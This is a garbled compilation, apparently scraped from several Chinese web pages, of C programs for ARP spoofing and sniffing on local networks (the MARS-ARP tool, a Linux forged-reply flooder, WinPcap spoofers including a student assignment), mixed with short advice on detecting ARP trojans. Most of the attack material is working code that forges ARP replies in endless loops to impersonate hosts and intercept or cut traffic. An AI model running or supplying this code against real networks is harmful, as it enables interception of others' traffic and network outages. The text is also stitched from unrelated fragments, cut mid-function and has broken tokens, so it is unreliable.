-1;}}firstip=ntohl(inet_addr(argv[2]));secondip=ntohl(inet_addr(argv[3]));total=secondip-firstip+1;printf("\nLibarary Version: %s",PacketGetVersion());adapterlength=sizeof(adaptername);if(PacketGetAdapterNames((char*)adaptername,&adapterlength)==FALSE){printf("PacketGetAdapterNames Error: %d\n",GetLastError());return -1;}name1=adaptername;name2=adaptername;i=0;while((*name1!='\0') || (*(name1-1)!='\0')){if(*name1=='\0'){memcpy(adapterlist[i],name2,2*(name1-name2));name2=name1+1;i++;}name1++;}adapternum=i;printf("\nAdapters Installed:\n");for(i=0;i<adapternum;i++)wprintf(L"%d - %s\n",i+1,adapterlist[i]);do{printf("\nSelect the number of the adapter to open: ");scanf("%d",&open);if(open>=1 && open<=adapternum)break;}while(open<1 || open>adapternum);lpadapter=PacketOpenAdapter(adapterlist[open-1]);if(!lpadapter || (lpadapter->hFile==INV ALID_HANDLE_V ALUE)){printf("PacketOpenAdapter Error: %d\n",GetLastError());return -1;}if(PacketGetNetType(lpadapter,&ntype)){printf("\n\t\t*** Host Information ***\n");printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);}npflen=sizeof(ipbuff);if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen)) {sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));myip=ntohl(sin.sin_addr.s_addr);printf("[MACAddress:]");}else{printf("\nNot get enough data\n");PacketFreePacket(lppackets);PacketCloseAdapter(lpadapter);return -1;}if((lppackets=PacketAllocatePacket())==FALSE){printf("PacketAllocatePacket send Error: %d\n",GetLastError());return -1;}rthread=CreateThread(NULL,0,sniff,(LPVOID)&opti,0,&threadrid);Sleep(300);if(getmine()){PacketFreePacket(lppackets);PacketFreePacket(lppacketr);PacketCloseAdapter(lpadapter);return -1;}Sleep(300);if((opti==1) || (opti==2)){for(i=0;i<total;i++){sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsi d);Sleep(30);}Sleep(1000);else if((opti==3) || (opti==4)){sthread=CreateThread(NULL,0,sendMASR,(LPVOID)&opti,0,&threadsi d);Sleep(300);CloseHandle(sthread);sthread=CreateThread(NULL,0,sendSR,(LPVOID)&opti,0,&threadsid);}WaitForSingleObject(sthread,INFINITE);CloseHandle(sthread);CloseHandle(rthread);if(PacketGetStats(lpadapter,&stat)==FALSE){printf("Warning: Unable to get the adapter stat\n");}elseprintf("\n\n%d packets received, %d packets lost !\n",stat.bs_recv,stat.bs_drop);}PacketFreePacket(lppackets);PacketFreePacket(lppacketr);PacketCloseAdapter(lpadapter);return 0;}MAS-ARP源代码C/C++#include <stdio.h>#include <conio.h>struct sockaddr_storage{unsigned char sa_len;unsigned char sa_family;unsigned char padding[128];};#include "packet32.h"#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "packet.lib")#define ETH_IP 0x0800#define ETH_ARP 0x0806#define ARP_REQUEST 0x0001#define ARP_REPLY 0x0002#define ARP_HARDW ARE 0x0001#define NDIS_PACKET_TYPE_PROMISCUOUS 0x00000020#define OP_MIN 1#define OP_MAX 4#define OP_MAC_GET 1#define OP_ANTI_SNIFF 2#define OP_RESET 3#define OP_SPOOF_SNIFF_SHOCK 4#define MAX_NUM_ADAPTER 20#pragma pack(push, 1) typedef struct ethdr{UCHAR eh_dst[6];UCHAR eh_src[6];USHORT eh_type; } ETHDR, *PETHDR; typedef struct arphdr{USHORT arp_hdr;USHORT arp_pro;UCHAR arp_hln;UCHAR arp_pln;USHORT arp_opt;UCHAR arp_sha[6];ULONG arp_spa;UCHAR arp_tha[6];ULONG arp_tpa;} ARPHDR, *PARPHDR; typedef struct iphdr{UCHAR h_lenver;UCHAR tos;USHORT total_len;USHORT ident;USHORT frag_and_flags;UCHAR ttl;UCHAR proto;USHORT checksum;UINT sourceip;UINT destip;} IPHDR, *PIPHDR;#pragma pack(pop)LPADAPTER lpAdapter = NULL; LPPACKET lpPacketRecv = NULL; LPPACKET lpPacketSend = NULL; ULONG ulSelfIP = 0; ULONG ulFirstIP = 0; ULONG ulSecondIP = 0; UCHAR arrucSelfMAC [6] = {0}; UCHAR arrucFirstMAC [6] = {0}; UCHAR arrucSecondMAC[6] = {0}; BOOL bIsSelfMAC = FALSE;BOOL bIsFirstMAC = FALSE;BOOL bIsSecondMAC = FALSE;FILE *fp = NULL;CHAR szMsg[50] = {0};INT iNum = 0;CHAR arrszAdapters [MAX_NUM_ADAPTER][1024] = {0};void ShowInfo(){printf("MARS-ARP --- ARP Tools, Modified by MARS, 2010-04-17\n");printf("Homepage: \n");printf("E-mail: zw198932@\n\n");printf("MARS: Student of <Nanjing University of Posts and Telecommunications>\n");printf("College: <Tongda College>\nSpecialty: <Compunication>\nTerm Class: <07>\n");}void Usage(){printf("\nUsage: MARS-ARP [-m|-a|-r|-s] firstip secondip \n\n");printf("Options:\n");printf(" -m mac Get the mac address from firstip to secondip\n");printf(" -a antisniff Get the sniffing host from firstip to secondip\n");printf(" -r reset Reset the spoofed host work normally\n");printf(" -s spoof 1> Spoof the host between firstip and secondip\n");printf(" sniff 2> Sniff if firstip == secondip == your own ip\n");printf(" shock 3> Shock if firstip == secondip != your own ip\n\n");printf("Attention:\n");printf(" Y ou must have installed the winpcap driver.\n\n");}void IPEnableRouter(){HKEY hKey;if (ERROR_SUCCESS !=RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", &hKey)) {printf("\nError opening: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\T cpip\\Parameters\\IPEnableRouter.\n");}DWORD dwValue = 1;RegSetValueEx(hKey, "IPEnableRouter", NULL, REG_DWORD, (CONST BYTE *)dwValue, 4);RegCloseKey(hKey);}INT GetSelfMAC(){CHAR szSendBuff[1024] = {0};INT k = 0;ETHDR tEthHdr;ARPHDR tArpHdr;for (k=0; k<6; k++){tEthHdr.eh_dst [k] = 0xff;tEthHdr.eh_src [k] = 0x82;tArpHdr.arp_sha[k] = 0x82;tArpHdr.arp_tha[k] = 0x00;}tEthHdr.eh_type = htons(ETH_ARP);tArpHdr.arp_hdr = htons(ARP_HARDW ARE);tArpHdr.arp_pro = htons(ETH_IP);tArpHdr.arp_hln = 6;tArpHdr.arp_pln = 4;tArpHdr.arp_opt = htons(ARP_REQUEST);tArpHdr.arp_tpa = htonl(ulSelfIP);tArpHdr.arp_spa = inet_addr("112.112.112.112");memset(szSendBuff, 0, sizeof(szSendBuff));memcpy(szSendBuff, &tEthHdr, sizeof(tEthHdr));memcpy(szSendBuff + sizeof(tEthHdr), &tArpHdr, sizeof(tArpHdr));PacketInitPacket(lpPacketSend, szSendBuff, sizeof(tEthHdr) + sizeof(tArpHdr));if (PacketSendPacket(lpAdapter, lpPacketSend, TRUE) == FALSE) {printf("PacketSendPacket in GetSelfMAC Error: %d\n", GetLastError());exit(-1);}return true;}void ParsePacket(LPPACKET lpPacket, int iOption){ULONG ulBytesRecv = lpPacket->ulBytesReceived;ULONG ulOffset = 0;ULONG ulTotalLen = 0;ULONG ulLen = 0;ULONG ulLines = 0;ULONG j = 0;ULONG k = 0;PETHDR pEthHdr = NULL;PARPHDR pArpHdr = NULL;PIPHDR pIPHdr = NULL;CHAR *szBuff = (CHAR *)lpPacket->Buffer;CHAR *pcChar = NULL;CHAR *pcLine = NULL;CHAR *pcBase = NULL;struct bpf_hdr *pBPFHdr = NULL;struct sockaddr_in tSockAddr;while (ulOffset < ulBytesRecv){if (kbhit()){return;}pBPFHdr = (struct bpf_hdr *)(szBuff + ulOffset);ulOffset += pBPFHdr->bh_hdrlen;pcChar = (char *)(szBuff + ulOffset);pcBase = pcChar;ulOffset = Packet_WORDALIGN(ulOffset + pBPFHdr->bh_caplen);pEthHdr = (PETHDR)pcChar;pArpHdr = (PARPHDR)(pcChar + sizeof(ETHDR));if (pEthHdr->eh_type == htons(ETH_IP)){pIPHdr = (PIPHDR)(pcChar + sizeof(ETHDR));if (bIsFirstMAC && bIsSecondMAC && (iOption == OP_SPOOF_SNIFF_SHOCK)){if ((((pIPHdr->sourceip != htonl(ulSelfIP)) && (pIPHdr->destip != htonl(ulSelfIP))&& !strcmp((char *)pEthHdr->eh_dst, (char *)arrucSelfMAC))&& ((pIPHdr->sourceip == htonl(ulFirstIP)) || (pIPHdr->destip == htonl(ulFirstIP))|| (pIPHdr->sourceip == htonl(ulSecondIP)) || (pIPHdr->destip == htonl(ulSecondIP))))|| ((ulFirstIP == ulSelfIP) && (ulSecondIP == ulSelfIP))){memset(szMsg, 0, sizeof(szMsg));tSockAddr.sin_addr.s_addr = pIPHdr->sourceip;printf("\n[IP:]%16s ---> [IP:]", inet_ntoa(tSockAddr.sin_addr));fprintf(fp, "\n[IP:]%16s ---> [IP:]", inet_ntoa(tSockAddr.sin_addr));strcpy(szMsg, inet_ntoa(tSockAddr.sin_addr));strcat(szMsg + 15, " ---> ");tSockAddr.sin_addr.s_addr = pIPHdr->destip;printf("%16s\n", inet_ntoa(tSockAddr.sin_addr));fprintf(fp, "%16s\n", inet_ntoa(tSockAddr.sin_addr));strcat(szMsg + 23, inet_ntoa(tSockAddr.sin_addr));// fseek(fp, -2, SEEK_CUR);// fprintf(fp, "\r\n");// fwrite(szMsg, 38, 1, fp);// fprintf(fp, "\r\n");ulLines = (pBPFHdr->bh_caplen + 15) / 16;// 原代码没有下面这句// --------------------------------ulTotalLen = pBPFHdr->bh_caplen;// --------------------------------for (k=0; k<ulLines; k++){pcLine = pcChar;printf("%08lx : ", pcChar - pcBase);fprintf(fp, "%08lx : ", pcChar - pcBase);ulLen = ulTotalLen;ulLen = (ulLen > 16) ? 16 : ulLen;for (j=0; j<ulLen; j++){printf("%02x ", *(BYTE *)pcChar++);fprintf(fp, "%02x ", *(BYTE *)pcChar++);}if (ulLen < 16){// 原句printf("%*s", (16 - ulLen) * 3, " ");// 改为// --------------------------------ulLen = 16 - ulLen;while (ulLen--){printf(" ");fprintf(fp, " ");}// --------------------------------}pcChar = pcLine;// 条件微调//---------------------------------------------------------------for (j=0; j<(ulTotalLen>16?16:ulTotalLen); j++, pcChar++){// 强制转换,VS08条件苛刻printf("%c", isprint(*(BYTE *)pcChar) ? *(BYTE *)pcChar : '.');fputc(isprint(*(BYTE *)pcChar) ? *(BYTE *)pcChar : '.', fp);}//----------------------------------------------------------------ulTotalLen -= ulLen;fprintf(fp, "\r\n");printf("\n");}fprintf(fp, "\r\n");}}continue;}else if ((pEthHdr->eh_type == htons(ETH_ARP)) && (pArpHdr->arp_opt == htons(ARP_REPLY))){tSockAddr.sin_addr.s_addr = pArpHdr->arp_spa;if (tSockAddr.sin_addr.s_addr == htonl(ulSelfIP)){memcpy(arrucSelfMAC, pEthHdr->eh_src, 6);if (!bIsSelfMAC)。
arp攻击(arp攻击解决办法)如果你发现经常网络掉线,或者发现自己的网站所有页面都被挂马,但到服务器上,查看页面源代码,却找不到挂马代码,就要考虑到是否自己机器或者同一IP段中其他机器是否中了ARP病毒。
除了装ARP防火墙以外,还可以通过绑定网关的IP和MAC来预防一下。
如果你发现经常网络掉线,或者发现自己的网站所有页面都被挂马,但到服务器上,查看页面源代码,却找不到挂马代码,就要考虑到是否自己机器或者同一IP段中其他机器是否中了ARP病毒。
除了装ARP防火墙以外,还可以通过绑定网关的IP和MAC来预防一下。
这个方法在局域网中比较适用:你所在的局域网里面有一台机器中了ARP病毒,它伪装成网关,你上网就会通过那台中毒的机器,然后它过一会儿掉一次线来骗取别的机器的帐户密码什么的东西。
下面是手动处理方法的简要说明:如何检查和处理“ ARP 欺骗”木马的方法1.检查本机的“ ARP 欺骗”木马染毒进程同时按住键盘上的“ CTRL ”和“ ALT ”键再按“ DEL ”键,选择“任务管理器”,点选“进程”标签。
察看其中是否有一个名为“ MIR0.dat ”的进程。
如果有,则说明已经中毒。
右键点击此进程后选择“结束进程”。
2.检查网内感染“ ARP 欺骗”木马染毒的计算机在“开始” - “程序” - “附件”菜单下调出“命令提示符”。
输入并执行以下命令:ipconfig记录网关IP 地址,即“Default Gateway ”对应的值,例如“ 59.66.36.1 ”。
再输入并执行以下命令:arp –a在“ Internet Address ”下找到上步记录的网关IP 地址,记录其对应的物理地址,即“ Physical Address ”值,例如“ 00-01-e8-1f-35-54 ”。
在网络正常时这就是网关的正确物理地址,在网络受“ ARP 欺骗”木马影响而不正常时,它就是木马所在计算机的网卡物理地址。
转贴-------ARP攻击C语⾔代码ARP攻击C语⾔代码本代码基本不具备危害性,只是通过MAC地址欺骗修改服务器缓冲区信息实现消息拦截。
假设被攻击服务器 IP 地址为 192.168.20.8 ,MAC地址为 00:0C:29:BD:1C:EF被拦截消息计算机IP地址为 192.168.20.9本机MAC 地址为 00:0C:29:AF:FB:D3#include<stdio.h>#include<string.h>#include<unistd.h>#include<stdlib.h>#include<net/if_arp.h>#include<net/ethernet.h>#include<sys/types.h>#include<sys/socket.h>#define ARP_LEN 30 //ARP帧头字节数void mac_str( char *mac, char *buf ){sscanf(mac, "%x:%x:%x:%x:%x:%x", buf, buf+1, buf+2, buf+3, buf+4, buf+5);}void ip_str( char *ip, char *buf ){sscanf(ip, "%d.%d.%d.%d", buf, buf+1, buf+2, buf+3);}void encapsulate_frame( char *dest_mac, char *source_mac, unsigned int type, char *buf ){mac_str(dest_mac, buf);mac_str(source_mac, buf+6);*(short *)(buf+12) = htons(type);}void encapsulate_arp( unsigned short ar_op, char *source_mac, char *source_ip, char *dest_mac, char *dest_ip, char *buf ) {struct arphdr parp;parp.ar_hrd = htons(ARPHRD_ETHER);parp.ar_pro = htons(ETHERTYPE_IP);parp.ar_hln = 6;parp.ar_pln = 4;parp.ar_op = htons(ar_op);memcpy(buf, &parp, sizeof(struct arphdr));char addr_buf[20];mac_str(source_mac, addr_buf);ip_str(source_ip, addr_buf + 6);mac_str(dest_mac, addr_buf + 10);ip_str(dest_ip, addr_buf + 16);memcpy(buf + sizeof(struct arphdr), addr_buf, 20);}int open_packet_socket( void ){int sock_fd;if( (sock_fd = socket(AF_INET, SOCK_PACKET, htons(ETH_P_PARP)) ) < 0 ){perror("Create socket error.\n");exit(-1);}return sock_fd;}int main( int argc, char **argv ){char *source_ip = "192.168.20.9"; // 真实 IP 地址char *source_mac = "00:0C:29:AF:FB:D3"; // 欺骗 MAC 地址char *dest_ip = "192.168.20.8";char *dest_mac = "00:0C:29:BD:1C:EF";char *buf = (char *)malloc(sizeof(struct ether_header) + ARP_LEN);encapsulate_frame(dest_mac, source_mac, ETHERTYPE_ARP, buf);encapsulate_arp(ARPOP_REPLY, source_mac, source_ip, dest_mac, dest_ip, buf+sizeof(struct ether_header)); int sock_fd = open_packet_socket();int i;struct sockaddr to;bzero( &to, sizeof(struct sockaddr) );to.sa_family = AF_INET;strcpy(to.sa_data, "eth0"); //通过eth0⽹卡发送;for(i=0; i<100000; i++){/* 44为以太⽹帧头长度加ARP帧头长度 ,sizeof(ether_header) + ARP_LEN */sendto(sock_fd, buf, 44, 0, &to, sizeof(struct sockaddr));usleep(100000);}printf("Send over.\n");return0;}。
ARP探测C语言实现ARP(Address Resolution Protocol,地址解析协议)是用于将IP 地址转换为物理地址(MAC地址)的协议。
在网络中,ARP请求和应答消息的交互可以帮助主机发现目标主机的物理地址。
下面是一个基于C语言的简单ARP探测实现。
ARP请求阶段:1.创建原始套接字,用于发送和接收网络数据包。
```cint sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);if (sockfd < 0)perror("Failed to create socket.");return -1;```2.设置套接字选项,允许发送与接收IP首部。
```cif (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable)) < 0)perror("Failed to set socket options.");return -1;}```3.设置目标主机的IP地址。
```cstruct in_addr dest_ip;if (inet_aton(target_ip, &dest_ip) == 0)printf("Invalid IP address specified.");return -1;```4.构造ARP请求包。
```cstruct arphdr arp_header;memset(&arp_header, 0, sizeof(arp_header));arp_header.ar_hrd = htons(ARPHRD_ETHER); // 以太网地址类型arp_header.ar_pro = htons(ETH_P_IP); // IP地址类型arp_header.ar_hln = ETH_ALEN; // MAC地址长度arp_header.ar_pln = sizeof(in_addr_t); // IP地址长度arp_header.ar_op = htons(ARPOP_REQUEST); // ARP请求操作码struct ether_arp ether_arp_pkt;memset(ðer_arp_pkt, 0, sizeof(ether_arp_pkt));//设置以太网帧的源地址和目标地址memcpy(ether_arp_pkt.arp_sha, mac_addr, ETH_ALEN); memset(ether_arp_pkt.arp_tha, 0xff, ETH_ALEN);//设置以太网帧的协议类型ether_arp_pkt.ea_hdr.ar_hrd = arp_header.ar_hrd;ether_arp_pkt.ea_hdr.ar_pro = arp_header.ar_pro;ether_arp_pkt.ea_hdr.ar_hln = arp_header.ar_hln;ether_arp_pkt.ea_hdr.ar_pln = arp_header.ar_pln;ether_arp_pkt.ea_hdr.ar_op = arp_header.ar_op;//设置ARP请求的源IP地址和目标IP地址ether_arp_pkt.arp_spa = inet_addr(sender_ip);ether_arp_pkt.arp_tpa = dest_ip.s_addr;//构造完成的ARP请求数据包memcpy(buffer, ðer_arp_pkt, sizeof(ether_arp_pkt)); ```5.设置套接字的目标地址。
ARP包解析与ARP欺骗攻击得分:u_char ar_hln; //硬件地址长度u_char ar_pln; //协议地址长度u_short ar_op; //操作u_char arp_smac[6]; //发送端以太网地址u_char arp_sip[4]; //发送端IPu_char arp_dmac[6]; //目的端以太网地址u_char arp_dip[4]; //目的IP}ether_arp;pcap_t *adhandle;void open_dev();void arp_init(ether_header* e_head,ether_arp* e_arp);void mk_arp_packt(u_char packet[],ether_header* e_head,ether_arp* e_arp);u_short byte_swap(u_short i);void main(){ether_arp* e_arp=(ether_arp*)malloc(sizeof(ether_arp));ether_header* e_head=(ether_header*)malloc(sizeof(ether_header));u_char packet[100];open_dev();//先打开网卡arp_init(e_head,e_arp);//输入目的主机的相关信息mk_arp_packt(packet,e_head,e_arp);//伪造Arp数据包while(true){if (pcap_sendpacket(adhandle, packet,42)!= 0)//发送数据{fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(adhandle));return;}elseprintf("Send Data Successfully\n");}}void open_dev(){pcap_if_t *alldevs;pcap_if_t *d;int index;int i=0;char errbuf[PCAP_ERRBUF_SIZE];if(pcap_findalldevs_ex(PCAP_SRC_IF_STRING,NULL,&alldevs,errbuf)==-1){fprintf(stderr,"Error in pcap_findalldevs_ex:%s\n",errbuf);exit(1);}for(d=alldevs;d!=NULL;d=d->next){printf("%d:\n%s",i++,d->name);if(d->description)printf("%s\n",d->description);elseprintf("No Description available");}if(i==0){printf("\nNo interfaces found!Make sure WinpCap is installed.\n");return;}printf("\n\nIf You Want Choose a Device To Capture The Data Please Input The Number Before The Device\n");scanf("%d",&index);char ch;ch=getchar();if(index>i||index<0){printf("You Choosed An Error Num");exit(1);}for(d=alldevs,i=0;i<index;d=d->next,i++);printf("You Choosed The Device It's Name Is:%s",d->name);//打开适配器为检测做好准备if((adhandle=pcap_open(d->name,65536,PCAP_OPENFLAG_PROMISCUOUS,1000,NULL,errbuf))==NULL){fprintf(stderr,"\nUnable to Open the adapter.%s is Not support by WinPcap\n",d->name);pcap_freealldevs(alldevs);return;}printf("\nDevice Open Successful");}void arp_init(ether_header* e_head,ether_arp* e_arp){int input;u_char ch;printf("Please Input Your Mac:");for (int i=0;i<6;i++){scanf("%x",&input);e_head->eh_src[i]=input;}ch=getchar();printf("Please Input Your IPAddress:");for (int i=0;i<4;i++){scanf("%d",&input);e_arp->arp_sip[i]=input;}printf("Please Input The Disitination Mac:");ch=getchar();for (int i=0;i<6;i++){scanf("%x",&input);e_head->eh_dst[i]=input;}printf("Please Input Disitination IPAddress:");for (int i=0;i<4;i++){scanf("%d",&input);e_arp->arp_dip[i]=input;}printf("Information Collected Over");}void mk_arp_packt(u_char packet[],ether_header* e_head,ether_arp* e_arp) {e_arp->ar_hln=0x06;e_arp->ar_hrd=byte_swap(1);e_arp->ar_pro=byte_swap(ETHERTYPE_IP);e_arp->ar_pln=0x04;e_arp->ar_op=byte_swap(ARPOP_REPLY);e_head->eh_type=byte_swap(ETHERTYPE_ARP);memcpy(e_arp->arp_smac,e_head->eh_src,6);memcpy(e_arp->arp_dmac,e_head->eh_dst,6);memcpy(packet,e_head,14);memcpy(packet+14,e_arp,28);}u_short byte_swap(u_short swap){u_short swaped;u_short low;u_short hight;。
信息安全原理——ARP攻击班级:07计算机1班姓名:胡益铭学号:E07620112ARP原理:ARP,即地址解析协议,实现通过IP地址得知其物理地址。
在TCP/IP网络环境下,每个主机都分配了一个32位的IP地址,这种互联网地址是在网际范围标识主机的一种逻辑地址。
为了让报文在物理网路上传送,必须知道对方目的主机的物理地址。
这样就存在把IP 地址变换成物理地址的地址转换问题。
以以太网环境为例,为了正确地向目的主机传送报文,必须把目的主机的32位IP地址转换成为48位以太网的地址。
这就需要在互连层有一组服务将IP地址转换为相应物理地址,这组协议就是ARP协议。
ARP数据报格式如下:什么是ARP欺骗:其实,此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。
ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首,是网吧老板和网管员的心腹大患。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。
它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。
第二种ARP欺骗的原理是——伪造网关。
它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。
在PC看来,就是上不了网了,“网络掉线了”。
本程序基于C语言,利用winpacp实现往局域网内发自定义的包,以达到ARP欺骗的目的。
首先从/archive/下载4.0beta1-WpdPack和4.0beta1-WinPcap.exe,版本很多,不过最新版本需要64位的系统,本人32位系统用不了。
直接点击4.0beta1-WinPcap.exe安装,然后在C:\Program Files\WinPcap下打开rpcapd.exe 服务。
然后在VC中,Tools→Options→Directories下配置include和library,将4.0beta1-WpdPack 中的include和library库包含进去,本人把4.0beta1-WpdPack放在D盘根目录下,结果如下:然后在Project→Settings→Link→Object/l ibrary Modules,在文本框的末尾添加“wpcap.lib packet.lib ws2_32.lib”。
编译运行后按提示输入,内容如下:1. \Device\NPF_GenericDialupAdapter (Adapter for generic dialup and VPN capture)2. \Device\NPF_{2A933761-706B-40E1-833D-7209ED0C0467} (W AN (PPP/SLIP) Interface)3. \Device\NPF_{547462F5-42E8-4FFB-85F9-54DA60C68BFD} (Broadcom NetXtreme Gigabit Ethernet Driver (Microsoft's Packet Scheduler) )2是二次拨号的端口,3是本地连接,1不知道是什么,没看懂。
这里选择3输入的接收方MAC地址00:1C:23:2D:65:44 是我自己的MAC地址,学校寝室的安全貌似做的很好,输入别人的MAC地址出不来东西。
目标IP地址10.9.190.22 也是我自己的IP此时生成的包如下:0 1c 23 2d 65 44 0 1b fc c2 1b b6 8 6 0 1 8 0 6 4 0 2 0 1b fc c2 1b b6 a 9 be 16 0 1c 23 2d 65 44 a 9 be 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0解释如下:以太网首部:0 1c 23 2d 65 44 //以太网目的地址,手动输入0 1b fc c2 1b b6 //以太网源地址,假的,固定ARP帧:8 6 //帧类型,0806表示ARP协议0 1 //硬件类型,0001以太网8 0 //协议类型,0800IP协议6 //硬件地址长度4 //协议地址长度0 2 //op,01表示请求,02表示回复0 1b fc c2 1b b6 //发送端以太网地址,同首部中以太网源地址a 9 be 16 //发送端IP地址,假的,固定0 1c 23 2d 65 44 //目的以太网地址,同首部中目的地址a 9 be 16 //目的IP地址,手动输入填充:0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0此时电脑右下角就会出现如下图的提示,IP地址冲突。
附main.cpp代码如下:#include <stdlib.h>#include <stdio.h>#include <pcap.h>int main(){pcap_if_t *alldevs;//定义一个网络接口的一个节点pcap_if_t *d;int i=0,inum=0,j;char errbuf[PCAP_ERRBUF_SIZE];u_char packet[60];pcap_t *adhandle;/* 获得设备列表*/if (pcap_findalldevs(&alldevs, errbuf) == -1){fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);exit(1);}/* 打印列表*/for(d= alldevs; d != NULL; d= d->next){printf("%d. %s", ++i, d->name);if (d->description)printf(" (%s)\n", d->description);elseprintf(" (No description available)\n");}if (i == 0){printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); return 0;}printf("Enter the interface number (1-%d):",i);scanf("%d", &inum);/* 跳转到选中的适配器*/for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);/* 打开适配器*/if ( (adhandle= pcap_open_live(d->name, // 设备名65536, // 要捕捉的数据包的部分// 65535保证能捕获到不同数据链路层上的每个数据包的全部内容1, // 混杂模式1000, // 读取超时时间errbuf // 错误缓冲池) ) == NULL){fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);/* 释放设备列表*/pcap_freealldevs(alldevs);return -1;}printf("输入被攻击方的MAC地址(如FF-FF-FF-FF-FF-FF则为广播)\n");scanf("%2x-%2x-%2x-%2x-%2x-%2x",&packet[0],&packet[1],&packet[2],&packet[3],&packet[ 4],&packet[5]);/* 以太网目的地址*//* 以太网源地址,当然是假的*/packet[6]=0x0e;packet[7]=0x07;packet[8]=0X62;packet[9]=0x00;packet[10]=0X01;packet[11]=0x12;/* 帧类型,0806表示ARP协议*/packet[12]=0x08;packet[13]=0x06;/* 硬件类型,0001以太网*/packet[14]=0x00;packet[15]=0x01;/* 协议类型,0800IP协议*/packet[16]=0x08;packet[17]=0x00;/*硬件地址长度*/packet[18]=0x06;/*协议地址长度*/packet[19]=0x04;/* op,01表示请求,02表示回复*/packet[20]=0x00;packet[21]=0x02;/*发送端以太网地址,同首部中以太网源地址*/for(i=22;i<28;i++){packet[i]=packet[i-16];}/*发送端IP地址*/printf("输入要假冒的ip地址\n");scanf("%d.%d.%d.%d",&packet[28],&packet[29],&packet[30],&packet[31]);/*目的以太网地址,同首部中目的地址*/for(i=32;i<38;i++){packet[i]=packet[i-32];}/*目的IP地址,手动输入*/printf("输入被攻击方的ip地址\n");scanf("%d.%d.%d.%d",&packet[38],&packet[39],&packet[40],&packet[41]);/*填充数据*/for(j=42;j<60;j++){packet[j]=0x00;}/*在屏幕上输出数据报*/for(i=0;i<60;i++){printf("%x ",packet[i]);}//int k=10;/*发送数据报*/while(1){pcap_sendpacket(adhandle, packet,60 );//一个装有要发送数据的缓冲区,要发送的长度,和一个适配器printf("OK\n");_sleep(1000);//k--;}pcap_close(adhandle);return 0;}。
